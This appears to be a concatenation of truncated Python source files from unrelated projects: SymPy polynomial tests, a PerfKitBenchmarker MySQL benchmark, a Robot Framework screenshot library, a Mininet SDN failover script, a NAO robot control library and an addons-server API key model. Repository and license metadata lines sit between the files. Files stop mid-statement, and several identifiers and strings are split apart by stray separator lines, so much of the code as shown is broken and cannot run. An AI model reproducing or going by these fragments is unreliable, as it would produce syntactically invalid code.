{(0,): 1, (1,): 2}, gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict({(1,): sin(y)}, gens=x, composite=False) == \
Poly(sin(y)*x, x, domain='EX')
assert Poly.from_dict({(1,): y}, gens=x, composite=False) == \
Poly(y*x, x, domain='EX')
assert Poly.from_dict({(1, 1): 1}, gens=(x, y), composite=False) == \
Poly(x*y, x, y, domain='ZZ')
assert Poly.from_dict({(1, 0): y}, gens=(x, z), composite=False) == \
Poly(y*x, x, z, domain='EX')
def test_Poly_from_list():
K = FF(3)
assert Poly.from_list([2, 1], gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_list([5, 1], gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_list([2, 1], gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_list([2, 1], gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_list([2, 1], gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_list([2, 1], gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_list([0, 1.0], gens=x).rep == DMP([RR(1.0)], RR)
assert Poly.from_list([1.0, 0], gens=x).rep == DMP([RR(1.0), RR(0.0)], RR)
raises(MultivariatePolynomialError, lambda: Poly.from_list([[]], gens=(x, y)))
def test_Poly_from_poly():
f = Poly(x + 7, x, domain=ZZ)
g = Poly(x + 2, x, modulus=3)
h = Poly(x + y, x, y, domain=ZZ)
K = FF(3)
assert Poly.from_poly(f) == f
assert Poly.from_poly(f, domain=K).rep == DMP([K(1), K(1)], K)
assert Poly.from_poly(f, domain=ZZ).rep == DMP([1, 7], ZZ)
assert Poly.from_poly(f, domain=QQ).rep == DMP([1, 7], QQ)
assert Poly.from_poly(f, gens=x) == f
assert Poly.from_poly(f, gens=x, domain=K).rep == DMP([K(1), K(1)], K)
assert Poly.from_poly(f, gens=x, domain=ZZ).rep == DMP([1, 7], ZZ)
assert Poly.from_poly(f, gens=x, domain=QQ).rep == DMP([1, 7], QQ)
assert Poly.from_poly(f, gens=y) == Poly(x + 7, y, domain='ZZ[x]')
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=K))
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=ZZ))
    raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=QQ))
assert Poly.from_poly(f, gens=(x, y)) == Poly(x + 7, x, y, domain='ZZ')
assert Poly.from_poly(
f, gens=(x, y), domain=ZZ) == Poly(x + 7, x, y, domain='ZZ')
assert Poly.from_poly(
f, gens=(x, y), domain=QQ) == Poly(x + 7, x, y, domain='QQ')
assert Poly.from_poly(
f, gens=(x, y), modulus=3) == Poly(x + 7, x, y, domain='FF(3)')
K = FF(2)
assert Poly.from_poly(g) == g
assert Poly.from_poly(g, domain=ZZ).rep == DMP([1, -1], ZZ)
raises(CoercionFailed, lambda: Poly.from_poly(g, domain=QQ))
assert Poly.from_poly(g, domain=K).rep == DMP([K(1), K(0)], K)
assert Poly.from_poly(g, gens=x) == g
assert Poly.from_poly(g, gens=x, domain=ZZ).rep == DMP([1, -1], ZZ)
raises(CoercionFailed, lambda: Poly.from_poly(g, gens=x, domain=QQ))
assert Poly.from_poly(g, gens=x, domain=K).rep == DMP([K(1), K(0)], K)
K = FF(3)
assert Poly.from_poly(h) == h
assert Poly.from_poly(
h, domain=ZZ).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, domain=QQ).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(h, domain=K).rep == DMP([[K(1)], [K(1), K(0)]], K)
assert Poly.from_poly(h, gens=x) == Poly(x + y, x, domain=ZZ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=ZZ))
assert Poly.from_poly(
h, gens=x, domain=ZZ[y]) == Poly(x + y, x, domain=ZZ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=QQ))
assert Poly.from_poly(
h, gens=x, domain=QQ[y]) == Poly(x + y, x, domain=QQ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, modulus=3))
assert Poly.from_poly(h, gens=y) == Poly(x + y, y, domain=ZZ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=ZZ))
assert Poly.from_poly(
h, gens=y, domain=ZZ[x]) == Poly(x + y, y, domain=ZZ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=QQ))
assert Poly.from_poly(
h, gens=y, domain=QQ[x]) == Poly(x + y, y, domain=QQ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, modulus=3))
assert Poly.from_poly(h, gens=(x, y)) == h
assert Poly.from_poly(
h, gens=(x, y), domain=ZZ).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, gens=(x, y), domain=QQ).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(
h, gens=(x, y), domain=K).rep == DMP([[K(1)], [K(1), K(0)]],
|
mateusz-blaszkowski/PerfKitBenchmarker
|
perfkitbenchmarker/linux_benchmarks/mysql_service_benchmark.py
|
Python
|
apache-2.0
| 33,031
| 0.004874
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MySQL Service Benchmarks.
This is a set of benchmarks that measures performance of MySQL Databases on
managed MySQL services.
- On AWS, we will use RDS+MySQL.
- On GCP, we will use Cloud SQL v2 (Performance Edition). As of July 2015, you
will need to request to whitelist your GCP project to get access to Cloud SQL
v2. Follow instructions on your GCP's project console to do that.
As other cloud providers deliver a managed MySQL service, we will add it here.
"""
import json
import logging
import re
import StringIO
import time
import uuid
from perfkitbenchmarker import benchmark_spec as benchmark_spec_class
from perfkitbenchmarker import configs
from perfkitbenchmarker import flags
from perfkitbenchmarker import sample
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.aws import aws_network
from perfkitbenchmarker.providers.aws import util
FLAGS = flags.FLAGS
flags.DEFINE_enum(
'mysql_svc_db_instance_cores', '4', ['1', '4', '8', '16'],
'The number of cores to be provisioned for the DB instance.')
flags.DEFINE_integer('mysql_svc_oltp_tables_count', 4,
'The number of tables used in sysbench oltp.lua tests')
flags.DEFINE_integer('mysql_svc_oltp_table_size', 100000,
'The number of rows of each table used in the oltp tests')
flags.DEFINE_integer('sysbench_warmup_seconds', 120,
'The duration of the warmup run in which results are '
'discarded, in seconds.')
flags.DEFINE_integer('sysbench_run_seconds', 480,
'The duration of the actual run in which results are '
'collected, in seconds.')
flags.DEFINE_integer('sysbench_thread_count', 16,
'The number of test threads on the client side.')
flags.DEFINE_integer('sysbench_latency_percentile', 99,
'The latency percentile we ask sysbench to compute.')
flags.DEFINE_integer('sysbench_report_interval', 2,
'The interval, in seconds, we ask sysbench to report '
'results.')
BENCHMARK_NAME = 'mysql_service'
BENCHMARK_CONFIG = """
mysql_service:
description: MySQL service benchmarks.
vm_groups:
default:
vm_spec: *default_single_core
"""
# Query DB creation status once every 15 seconds
DB_STATUS_QUERY_INTERVAL = 15
# How many times we will wait for the service to create the DB
# total wait time is therefore: "query interval * query limit"
DB_STATUS_QUERY_LIMIT = 200
# Map from FLAGs.mysql_svc_db_instance_cores to RDS DB Type
RDS_CORE_TO_DB_CLASS_MAP = {
'1': 'db.m3.medium',
'4': 'db.m3.xlarge',
'8': 'db.m3.2xlarge',
'16': 'db.r3.4xlarge', # m3 series doesn't have 16 core.
}
RDS_DB_ENGINE = 'MySQL'
RDS_DB_ENGINE_VERSION = '5.6.23'
RDS_DB_STORAGE_TYPE_GP2 = 'gp2'
# Storage IOPS capacity of the DB instance.
# Currently this is fixed because the cloud provider GCP does not support
# changing this setting. As soon as it supports changing the storage size, we
# will expose a flag here to allow caller to select a storage size.
# Default GCP storage size is 1TB PD-SSD which supports 10K Read or 15K Write
# IOPS (12.5K mixed).
# To support 12.5K IOPS on EBS-GP, we need 4170 GB disk.
RDS_DB_STORAGE_GP2_SIZE = '4170'
# A list of status strings that are possible during RDS DB creation.
RDS_DB_CREATION_PENDING_STATUS = frozenset(
['creating', 'modifying', 'backing-up', 'rebooting'])
# Constants defined for Sysbench tests.
RAND_INIT_ON = 'on'
DISABLE = 'disable'
UNIFORM = 'uniform'
OFF = 'off'
MYSQL_ROOT_USER = 'root'
MYSQL_ROOT_PASSWORD_PREFIX = 'Perfkit8'
MYSQL_PORT = '3306'
NORMAL_SYSBENCH_PATH_PREFIX = '/usr'
PREPARE_SCRIPT_PATH = '/share/doc/sysbench/tests/db/parallel_prepare.lua'
OLTP_SCRIPT_PATH = '/share/doc/sysbench/tests/db/oltp.lua'
SYSBENCH_RESULT_NAME_DATA_LOAD = 'sysbench data load time'
SYSBENCH_RESULT_NAME_TPS = 'sysbench tps'
SYSBENCH_RESULT_NAME_LATENCY = 'sysbench latency'
NA_UNIT = 'NA'
SECONDS_UNIT = 'seconds'
MS_UNIT = 'milliseconds'
# These are the constants that should be specified in GCP's cloud SQL command.
DEFAULT_BACKUP_START_TIME = '07:00'
GCP_MY_SQL_VERSION = 'MYSQL_5_6'
GCP_PRICING_PLAN = 'PACKAGE'
RESPONSE_TIME_TOKENS = ['min', 'avg', 'max', 'percentile']
def GetConfig(user_config):
return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
class DBStatusQueryError(Exception):
pass
def _GenerateRandomPassword():
""" Generates a random password to be used by the DB instance.
Args:
None
Returns:
A string that can be used as password to a DB instance.
"""
return '%s%s' % (MYSQL_ROOT_PASSWORD_PREFIX, str(uuid.uuid4())[-8:])
def ParseSysbenchOutput(sysbench_output, results, metadata):
"""Parses sysbench output.
Extract relevant TPS and latency numbers, and populate the final result
collection with these information.
Specifically, we are interested in tps numbers reported by each reporting
interval, and the summary latency numbers printed at the end of the run in
"General Statistics" -> "Response Time".
Example Sysbench output:
sysbench 0.5: multi-threaded system evaluation benchmark
<... lots of output we don't care here ...>
Threads started!
[ 2s] threads: 16, tps: 526.38, reads: 7446.79, writes: 2105.52, response
time: 210.67ms (99%), errors: 0.00, reconnects: 0.00
< .... lots of tps output every 2 second, we need all those>
< ... lots of other output we don't care for now...>
General statistics:
total time: 17.0563s
total number of events: 10000
total time taken by event execution: 272.6053s
response time:
min: 18.31ms
avg: 27.26ms
max: 313.50ms
approx. 99 percentile: 57.15ms
< We care about the response time section above, these are latency numbers>
< then there are some outputs after this, we don't care either>
Args:
sysbench_output: The output from sysbench.
results: The dictionary to store results based on sysbench output.
metadata: The metadata to be passed along to the Samples class.
"""
all_tps = []
seen_general_statistics = False
seen_response_time = False
response_times = {}
sysbench_output_io = StringIO.StringIO(sysbench_output)
for line in sysbench_output_io.readlines():
if re.match('^\[', line):
tps = re.findall('tps: (.*?),', line)
all_tps.append(float(tps[0]))
continue
if line.startswith('General statistics:'):
seen_general_statistics = True
continue
if seen_general_statistics:
if re.match('^ +response time:.*', line):
seen_response_time = True
continue
if seen_general_statistics and seen_response_time:
for token in RESPONSE_TIME_TOKENS:
search_string = '.*%s: +(.*)ms' % token
if re.findall(search_string, line):
response_times[token] = float(re.findall(search_string, line)[0])
tps_line = ', '.join(map(str, all_tps))
# Print all tps data points in the log for reference. And report
# percentiles of these tps data in the final result set.
logging.info('All TPS numbers: \n %s', tps_line)
tps_percentile = sample.PercentileCalculator(all_tps)
for percentile in sample.PERCENTILES_LIST:
percentile_string = 'p%s' % str(percentile)
logging.info('%s tps %f', percentile_string,
tps_percentile[percentile_string])
metric_na
|
eric-stanley/robotframework
|
src/robot/libraries/Screenshot.py
|
Python
|
apache-2.0
| 13,020
| 0.000998
|
# Copyright 2008-2014 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
if sys.platform.startswith('java'):
from java.awt import Toolkit, Robot, Rectangle
from javax.imageio import ImageIO
from java.io import File
elif sys.platform == 'cli':
import clr
clr.AddReference('System.Windows.Forms')
clr.AddReference('System.Drawing')
from System.Drawing import Bitmap, Graphics, Imaging
from System.Windows.Forms import Screen
else:
try:
import wx
except ImportError:
wx = None
try:
from gtk import gdk
except ImportError:
gdk = None
try:
from PIL import ImageGrab # apparently available only on Windows
except ImportError:
ImageGrab = None
from robot import utils
from robot.api import logger
from robot.libraries.BuiltIn import BuiltIn
from robot.version import get_version
class Screenshot(object):
"""Test library for taking screenshots on the machine where tests are run.
Notice that successfully taking screenshots requires tests to be run with
a physical or virtual display.
This library was heavily enhanced in Robot Framework 2.5.5 release. Old
keywords for taking screenshots were deprecated and they have since been
removed.
= Using with Python =
With Python you need to have one of the following modules installed to be
able to use this library. The first module that is found will be used.
- wxPython :: http://wxpython.org :: Required also by RIDE so many Robot
Framework users already have this module installed.
- PyGTK :: http://pygtk.org :: This module is available by default on most
Linux distributions.
- Python Imaging Library (PIL) :: http://www.pythonware.com/products/pil ::
This module can take screenshots only on Windows.
= Using with Jython and IronPython =
With Jython and IronPython this library uses APIs provided by JVM and .NET
platforms, respectively. These APIs are always available and thus no
external modules are needed.
IronPython support was added in Robot Framework 2.7.5.
= Where screenshots are saved =
By default screenshots are saved into the same directory where the Robot
Framework log file is written. If no log is created, screenshots are saved
into the directory where the XML output file is written.
It is possible to specify a custom location for screenshots using
`screenshot_directory` argument in `importing` and `Set Screenshot Directory`
keyword during execution. It is also possible to save screenshots using
an absolute path.
"""
ROBOT_LIBRARY_SCOPE = 'TEST SUITE'
ROBOT_LIBRARY_VERSION = get_version()
def __init__(self, screenshot_directory=None):
"""Configure where screenshots are saved.
If `screenshot_directory` is not given, screenshots are saved into
same directory as the log file. The directory can also be set using
`Set Screenshot Directory` keyword.
Examples (use only one of these):
| =Setting= | =Value= | =Value= | =Value= |
| Library | Screenshot | | # Default location |
| Library | Screenshot | ${TEMPDIR} | # System temp |
"""
self._given_screenshot_dir = self._norm_path(screenshot_directory)
self._screenshot_taker = ScreenshotTaker()
def _norm_path(self, path):
if not path:
return path
return os.path.normpath(path.replace('/', os.sep))
@property
def _screenshot_dir(self):
return self._given_screenshot_dir or self._log_dir
@property
def _log_dir(self):
variables = BuiltIn().get_variables()
outdir = variables['${OUTPUTDIR}']
log = variables['${LOGFILE}']
log = os.path.dirname(log) if log != 'NONE' else '.'
return self._norm_path(os.path.join(outdir, log))
def set_screenshot_directory(self, path):
"""Sets the directory where screenshots are saved.
It is possible to use `/` as a path separator in all operating systems.
Path to the old directory is returned.
The directory can also be set in `importing`.
"""
path = self._norm_path(path)
if not os.path.isdir(path):
raise RuntimeError("Directory '%s' does not exist." % path)
old = self._screenshot_dir
self._given_screenshot_dir = path
return old
def take_screenshot(self, name="screenshot", width="800px"):
"""Takes a screenshot in JPEG format and embeds it into the log file.
Name of the file where the screenshot is stored is derived from the
given `name`. If the `name` ends with extension `.jpg` or `.jpeg`,
the screenshot will be stored with that exact name. Otherwise a unique
name is created by adding an underscore, a running index and
an extension to the `name`.
The name will be interpreted to be relative to the directory where
the log file is written. It is also possible to use absolute paths.
Using `/` as a path separator works in all operating systems.
`width` specifies the size of the screenshot in the log file.
Examples: (LOGDIR is determined automatically by the library)
| Take Screenshot | | | # LOGDIR/screenshot_1.jpg (index automatically incremented) |
| Take Screenshot | mypic | | # LOGDIR/mypic_1.jpg (index automatically incremented) |
| Take Screenshot | ${TEMPDIR}/mypic | | # /tmp/mypic_1.jpg (index automatically incremented) |
| Take Screenshot | pic.jpg | | # LOGDIR/pic.jpg (always uses this file) |
| Take Screenshot | images/login.jpg | 80% | # Specify both name and width. |
| Take Screenshot | width=550px | | # Specify only width. |
The path where the screenshot is saved is returned.
"""
path = self._save_screenshot(name)
self._embed_screenshot(path, width)
return path
def take_screenshot_without_embedding(self, name="screenshot"):
"""Takes a screenshot and links it from the log file.
This keyword is otherwise identical to `Take Screenshot` but the saved
screenshot is not embedded into the log file. The screenshot is linked
so it is nevertheless easily available.
"""
path = self._save_screenshot(name)
self._link_screenshot(path)
return path
def _save_screenshot(self, basename, directory=None):
path = self._get_screenshot_path(basename, directory)
return self._screenshot_to_file(path)
def _screenshot_to_file(self, path):
path = self._validate_screenshot_path(path)
logger.debug('Using %s modules for taking screenshot.'
% self._screenshot_taker.module)
try:
self._screenshot_taker(path)
except:
logger.warn('Taking screenshot failed: %s\n'
'Make sure tests are run with a physical or virtual display.'
% utils.get_error_message())
return path
def _validate_screenshot_path(self, path):
path = utils.abspath(self._norm_path(path))
if not os.path.exists(os.path.dirname(path)):
raise RuntimeError("Directory '%s' where to save the screenshot "
"does not exist" % os.path.dirname(path))
return path
def _get_screenshot_path(self, basename, directory):
directory = self._norm_path(directory) i
|
ardhipoetra/SDN-workbench
|
sch3.py
|
Python
|
gpl-2.0
| 3,578
| 0.044159
|
#!/usr/bin/python
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.cli import CLI
from mininet.log import setLogLevel, info
import time
import os
import subprocess
import csv
import StringIO
import iptc
HOSTS = 3
p1_log = open('logs-example/log.p1.txt', 'w')
p2_log = open('logs-example/log.p2.txt', 'w')
def closePort(port):
rule=iptc.Rule()
rule.protocol = "tcp"
match = rule.create_match("tcp")
match.dport = str(port)
chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
rule.target = rule.create_target("DROP")
chain.insert_rule(rule)
def unClosePort(port):
rule=iptc.Rule()
    rule.protocol = "tcp"
    match = rule.create_match("tcp")
match.dport = str(port)
chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
rule.target = rule.create_target("DROP")
chain.delete_rule(rule)
def myNet():
global p1
global p2
global p3
global p4
cPort1=6666
cPort2=6667
hosts=[]
kill = 0
net = Mininet( topo=None, build=False, autoSetMacs=True)
con1 = net.addController( 'c0', controller=RemoteController, ip='127.0.0.1', port=cPort1)
con2 = net.addController( 'c1', controller=RemoteController, ip='127.0.0.1', port=cPort2)
for x in range(0, HOSTS):
hostname = "h%d" %(x)
switchname = "s%d" %(x)
host = net.addHost(hostname)
switch = net.addSwitch(switchname)
if (x!=0):
net.addLink(switch, lastswitch)
lastswitch = switch
net.addLink(host,switch)
net.build()
switch.start([con1,con2])
hosts.append(host)
net.start()
tping = time.time()
print 'h0 ping : %.10f' % tping
hosts[0].cmdPrint('hping3 -c 200 -i u20000 ',hosts[1].IP(),' > logs-example/log.ping12.txt 2>&1 &')
#20ms every ping * 200 -> 4s
while True:
tcur = time.time()
if tcur - tping > 2: # after 2s running
# print 'SET ROLE C1 SLAVE '
# p1.stdin.write("import pox.openflow.nicira as nx\n")
# p1.stdin.write("for connection in core.openflow.connections:\n")
# p1.stdin.write("\tconnection.send(nx.nx_role_request(slave='true'))\n")
# p1.stdin.write('\n')
print 'close port %i in %.10f' %(cPort1,tcur)
closePort(cPort1)
break
print 'START C2 AS MASTER at %.10f' %time.time()
p2 = subprocess.Popen(['pox/pox.py',"master67"],stdin=subprocess.PIPE, stdout=p2_log,stderr=p2_log,preexec_fn=os.setpgrp)
while True:
p = subprocess.Popen(["ovs-vsctl", "-f", "csv", "list", "controller"], stdout=subprocess.PIPE)
output, err = p.communicate()
f = StringIO.StringIO(output)
reader = csv.reader(f, delimiter=',')
rownum = 0
con66 = [] # not using this for now
con67 = []
for row in reader:
uuid = row[0]
target = row[15]
role = row[13]
i = target.find(str(cPort2))
if i != -1:
if (role == 'master'):
con67.append(uuid)
f.close()
if len(con67) == HOSTS:
uptime = time.time()
print 'new master ready at %.10f' %uptime
break
print 'now wait for hping3 to finish..'
hosts[0].cmdPrint('wait %hping3')
print 'hping3 finished at %.10f' %time.time()
print 'open the port..'
unClosePort(cPort1)
print 'stopping mininet'
net.stop()
print 'stopping pox(s)..'
p1.terminate()
p2.terminate()
print 'timestamp difference %.10f' %(uptime-tcur)
if __name__ == '__main__':
setLogLevel( 'info' )
p1 = subprocess.Popen(['pox/pox.py', "master66"],stdin=subprocess.PIPE, stdout=p1_log,stderr=p1_log,preexec_fn=os.setpgrp)
print 'c1 runs, master'
print 'wait for 3 seconds...'
time.sleep(3)
myNet()
print 'close pox logs..'
p1_log.close()
p2_log.close()
print 'bye'
# t.process.terminate()
|
davesnowdon/nao-recorder
|
src/main/python/fluentnao/nao.py
|
Python
|
gpl-2.0
| 10,366
| 0.006946
|
'''
Created on 31st October , 2012
@author: Don Najd
'''
import logging
from naoutil.naoenv import NaoEnvironment, make_environment
from fluentnao.core.arms import Arms
from fluentnao.core.elbows import Elbows
from fluentnao.core.feet import Feet
from fluentnao.core.hands import Hands
from fluentnao.core.head import Head
from fluentnao.core.joints import Joints
from fluentnao.core.legs import Legs
from fluentnao.core.wrists import Wrists
from fluentnao.core.leds import Leds
from fluentnao.core.audio import Audio
from fluentnao.core.naoscript import NaoScript
import almath
import math
import time
from datetime import datetime, timedelta
class Nao(object):
# init method
def __init__(self, env, log_function=None):
super(Nao, self).__init__()
# jobs for threading
self.jobs = []
# set motion proxy & log
self.env = env
self.log_function = log_function
if not log_function:
self.logger = logging.getLogger("fluentnao.nao.Nao")
# joints
self.joints = Joints()
self.chains = self.joints.Chains
# other
self.naoscript = NaoScript(self)
self.leds = Leds(self)
self.audio = Audio(self)
# head
self.head = Head(self)
# arms
self.hands = Hands(self)
self.wrists = Wrists(self, self.hands)
self.elbows = Elbows(self, self.wrists, self.hands)
self.arms = Arms(self, self.elbows, self.wrists, self.hands)
# legs
self.feet = Feet(self)
self.legs = Legs(self, self.feet)
# global duration
self.set_duration(1.5)
def log(self, msg):
if (self.log_function):
self.log_function(str(datetime.now()) + "|" + msg)
else:
self.logger.debug(str(datetime.now()) + "|" + msg)
###################################
# text to speech
###################################
def say(self, text):
self.env.tts.post.say(text)
return self;
def say_and_block(self, text):
self.env.tts.say(text)
return self;
def wait(self, seconds):
time.sleep(seconds)
return self;
###################################
# Postures
###################################
def stand_init(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("StandInit", speed))
taskId = self.env.robotPosture.post.goToPosture("StandInit", speed)
self.jobs.append(taskId)
self.go()
return self;
def sit_relax(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("SitRelax", speed))
taskId = self.env.robotPosture.post.goToPosture("SitRelax", speed)
self.jobs.append(taskId)
self.go()
return self;
def stand_zero(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("StandZero", speed))
taskId = self.env.robotPosture.post.goToPosture("StandZero", speed)
self.jobs.append(taskId)
self.go()
return self;
def lying_belly(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("LyingBelly", speed))
taskId = self.env.robotPosture.post.goToPosture("LyingBelly", speed)
self.jobs.append(taskId)
self.go()
return self;
def lying_back(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("LyingBack", speed))
taskId = self.env.robotPosture.post.goToPosture("LyingBack", speed)
self.jobs.append(taskId)
self.go()
return self;
def stand(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Stand", speed))
self.env.robotPosture.goToPosture("Stand", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
def crouch(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Crouch", speed))
taskId = self.env.robotPosture.post.goToPosture("Crouch", speed)
self.jobs.append(taskId)
self.go()
return self;
def sit(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("S
|
it", speed))
self.env.robotPosture.post.goToPosture("Sit", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
###################################
# stiffness
###################################
def stiff(self):
pNames = self.joints.Chains.Body
pStiffnessLists = 1.0
pTimeLists = 1.0
self.env.motion.stiffnessInterpolation(pNames, pStiffnessLists, pTimeLists)
return self;
def rest(self):
self.env.motion.rest()
return self;
def relax(self):
pNames = self.joints.Chains.Body
pStiffnessLists = 0
pTimeLists = 1.0
self.env.motion.stiffnessInterpolation(pNames, pStiffnessLists, pTimeLists)
return self;
###################################
# Whole Body Motion & Balance
###################################
def whole_body_disable(self):
self.log("wbDisable")
isEnabled = False
self.env.motion.wbEnable(isEnabled)
def whole_body_enable(self):
self.log("wbEnable")
isEnabled = True
self.env.motion.wbEnable(isEnabled)
def foot_state(self, supportLeg="Legs", stateName="Fixed"):
# Legs are constrained fixed
# supportLeg: Legs, LLeg or RLeg
# stateName: Fixed, Plane or Free
self.log("supportLeg=%s|stateName=%s" % (supportLeg, stateName))
self.env.motion.wbFootState(stateName, supportLeg)
def constrain_motion(self, supportLeg="Legs"):
# Constraint Balance Motion / Support Polygon
# supportLeg: Legs, LLeg or RLeg
isEnable = True
self.env.motion.wbEnableBalanceConstraint(isEnable, supportLeg)
def balance(self, leg, duration):
duration = self.determine_duration(duration)
# stiffen body
self.stiff()
        self.whole_body_enable()
self.foot_state()
self.constrain_motion()
# Com go to LLeg
supportLeg = leg
self.env.motion.wbGoToBalance(supportLeg, duration)
self.whole_body_disable()
###################################
# Duration
###################################
def set_duration(self, durationInSeconds):
self.globalDuration = durationInSeconds
return self;
def determine_duration(self, durationInSeconds):
if durationInSeconds > 0:
return durationInSeconds
return self.globalDuration
###################################
# blocking
###################################
def go(self):
for taskId in self.jobs:
self.log("taskId=%s|action=wait" % (taskId))
d1 = datetime.now()
self.env.motion.wait(taskId, 8000)
d2 = datetime.now()
r = d2 - d1
self.log("taskId=%s|action=done|seconds=%s" % (taskId, r.total_seconds()))
self.jobs[:] = []
self.log("done")
return self
###################################
# movement
###################################
def move(self, chain, angleListInRadians, timeListInSeconds):
# motion w/ blocking call
taskId = self.env.motion.post.angleInterpolation(chain, angleListInRadians, timeListInSeconds, True)
# log
self.log("|taskId=%s|chain=%s|angleList=%s" % (taskId, chain, angleListInRadians))
self.jobs.append(taskId)
def move_with_degrees_and_duration(self, jointName, angleInDegrees, durationInSeconds):
# convert to radians
angleInRadians = angleInDegrees * almath.TO_RAD
# move
self.move(jointName, [angleInRadians], durationInSeconds)
###################################
# helpers
###################################
def get_target_angles_for_chain(self, chain, angle):
# Get the Number of Joints
numBodies = len(self.env.motion.getJointNames(chain))
# We prepare a collection of float
|
aviarypl/mozilla-l10n-addons-server
|
src/olympia/api/models.py
|
Python
|
bsd-3-clause
| 3,638
| 0
|
import binascii
import os
import random
from django.db import models
from django.utils.encoding import force_text, python_2_unicode_compatible
from aesfield.field import AESField
from olympia.amo.fields import PositiveAutoField
from olympia.amo.models import ModelBase
from olympia.users.models import UserProfile
# These are identifiers for the type of API keys that can be stored
# in our database.
SYMMETRIC_JWT_TYPE = 1
API_KEY_TYPES = [
SYMMETRIC_JWT_TYPE,
]
@python_2_unicode_compatible
class APIKey(ModelBase):
"""
A developer's key/secret pair to access the API.
"""
id = PositiveAutoField(primary_key=True)
user = models.ForeignKey(UserProfile, related_name='api_keys')
# A user can only have one active key at the same time, it's enforced by
# a unique db constraint. Since we keep old inactive keys though, nulls
# need to be allowed (and we need to always set is_active=None instead of
# is_active=False when revoking keys).
is_active = models.NullBooleanField(default=True)
type = models.PositiveIntegerField(
choices=dict(zip(API_KEY_TYPES, API_KEY_TYPES)).items(), default=0)
key = models.CharField(max_length=255, db_index=True, unique=True)
# TODO: use RSA public keys instead? If we were to use JWT RSA keys
# then we'd only need to store the public key.
secret = AESField(aes_key='api_key:secret', aes_prefix=b'aes:')
class Meta:
db_table = 'api_key'
unique_together = (('user', 'is_active'),)
def __str__(self):
return (
u'<{cls} user={user}, type={type}, key={key} secret=...>'
.format(cls=self.__class__.__name__, key=self.key,
type=self.type, user=self.user))
@classmethod
def get_jwt_key(cls, **kwargs):
"""
Return a single active APIKey instance for a given user or key.
"""
kwargs['is_active'] = True
return cls.objects.get(type=SYMMETRIC_JWT_TYPE, **kwargs)
@classmethod
def new_jwt_credentials(cls, user):
"""
Generates a new key/secret pair suitable for symmetric JWT signing.
This method must be run within a db transaction.
Returns an instance of APIKey.
"""
key = cls.get_unique_key('user:{}:'.format(user.pk))
return cls.objects.create(
key=key, secret=cls.generate_secret(32),
type=SYMMETRIC_JWT_TYPE, user=user, is_active=True)
@classmethod
def get_unique_key(cls, prefix, try_count=1, max_tries=1000):
if try_count >= max_tries:
raise RuntimeError(
'a unique API key could not be found after {} tries'
.format(max_tries))
key = '{}{}'.format(prefix, random.randint(0, 999))
if cls.objects.filter(key=key).exists():
return cls.get_unique_key(prefix, try_count=try_count + 1,
max_tries=max_tries)
return key
@staticmethod
def generate_secret(byte_length):
"""
Return a true random ascii string containing byte_length of randomness.
The resulting key is suitable for cryptography.
The key will be hex encoded which means it will be twice as long
as byte_length, i.e. 40 random bytes yields an 80 byte string.
byte_length must be at least 32.
"""
